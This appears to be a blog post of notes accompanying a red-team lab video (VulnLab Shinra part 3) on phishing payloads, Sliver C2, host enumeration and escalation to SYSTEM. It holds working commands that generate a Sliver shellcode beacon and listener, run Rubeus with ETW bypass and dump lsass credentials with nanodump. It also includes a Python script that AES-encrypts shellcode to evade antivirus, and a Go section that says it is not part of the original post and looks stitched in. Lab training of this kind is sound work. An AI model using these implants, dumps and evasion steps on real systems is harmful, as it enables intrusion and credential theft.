
VL Shinra Part 3 - Initial Payload Design, Host Enumeration & getting SYSTEM

This is the third video of the Shinra series. We will get a shell on Ashleigh's machine & escalate privileges.

Topics

  • Phishing: Payload design & getting a shell
  • Sliver Basics
  • Host enumeration
  • Switching users with runas
  • Exploiting SeDebugPrivilege to get SYSTEM
  • Post Exploitation

Additional things to try on the lab:

  • See if you can run the domain enumeration steps on client01 in contrast to using your own machine, e.g. port-scanning, bloodhound, adcs, credential spraying etc.
  • Craft a payload using any other technique so it gets around the AV
  • Craft a payload using indirect syscalls or modify the existing one so it uses DLL Hijacking instead

Notes

Sliver

# generate a beacon
generate beacon --mtls 127.0.0.1:53 --os windows --arch amd64 --format shellcode --save xct.raw

# start listener
mtls --lport 53

# execute assembly (in-process, bypasses ETW)
execute-assembly -i -E /home/xct/drop/Rubeus.exe klist|triage|...

# nanodump via armory
ps (list lsass process id)
nanodump 680 core.dmp 1 PMDM

# interactive shell (you can omit the argument to get powershell)
shell --shell-path "c:\\windows\\system32\\cmd.exe"

Encrypt Shellcode with AES

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import sys

if __name__ == "__main__":
    # file: raw shellcode (e.g. xct.raw from sliver); key: 16/24/32 bytes; iv: 16 bytes
    if len(sys.argv) < 4:
        print("Usage: ./shellcode_encrypt file key iv")
        exit(1)

    file_name = sys.argv[1]
    password = sys.argv[2].encode()
    iv = sys.argv[3].encode()

    with open(file_name, "rb") as f:
        data = f.read()

    print(f"Key: {password}")
    print(f"IV: {iv}")
    print(f"Data: {data[:16]}..")

    # PKCS#7-pad to the AES block size, then AES-CBC with the raw key and IV
    data = pad(data, AES.block_size)
    cipher = AES.new(password, AES.MODE_CBC, iv)
    cipher_text = cipher.encrypt(data)

    with open('xct.bin', 'wb') as f:
        f.write(cipher_text)

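
The same AES-CBC/PKCS#7 convention in Go, using only the standard library, as an added example that is not part of the original post or of Sliver: it checks key and IV lengths up front (the script above only finds a wrong length when AES.new raises) and includes the matching decrypt, so a produced xct.bin can be checked to round-trip with the intended key and IV before anything depends on it. The key, IV and sample bytes are constructed placeholders.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// encryptCBC mirrors the script: PKCS#7-pad to 16 bytes, then AES-CBC with the raw key and IV.
// aes.NewCipher rejects keys that are not 16, 24 or 32 bytes, the same condition AES.new enforces.
func encryptCBC(plain, key, iv []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(iv) != aes.BlockSize {
		return nil, fmt.Errorf("need a 16/24/32-byte key and a 16-byte IV: key error %v, IV length %d", err, len(iv))
	}
	n := aes.BlockSize - len(plain)%aes.BlockSize // 1..16, exactly what pad() appends
	padded := append(append([]byte{}, plain...), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return out, nil
}

// decryptCBC is the inverse; truncated input or bad padding (wrong key or IV) is an error, not a panic.
func decryptCBC(ct, key, iv []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(iv) != aes.BlockSize {
		return nil, fmt.Errorf("need a 16/24/32-byte key and a 16-byte IV: key error %v, IV length %d", err, len(iv))
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("ciphertext length %d is not a whole number of blocks", len(ct))
	}
	out := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ct)
	n := int(out[len(out)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(out[len(out)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, fmt.Errorf("invalid PKCS#7 padding")
	}
	return out[:len(out)-n], nil
}

func main() { // constructed sample standing in for xct.raw; key and IV are 16 bytes, as the script takes them
	key, iv := []byte("0123456789abcdef"), []byte("fedcba9876543210")
	ct, _ := encryptCBC([]byte("constructed sample payload"), key, iv)
	back, err := decryptCBC(ct, key, iv)
	fmt.Printf("%d ciphertext bytes, recovered %q, err=%v\n", len(ct), back, err)
}
```

A file written by the Python script decrypts with decryptCBC given the same key and IV strings, which is a quick way to confirm the artifact before it is handed on.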
This post is licensed under CC BY 4.0 by the author.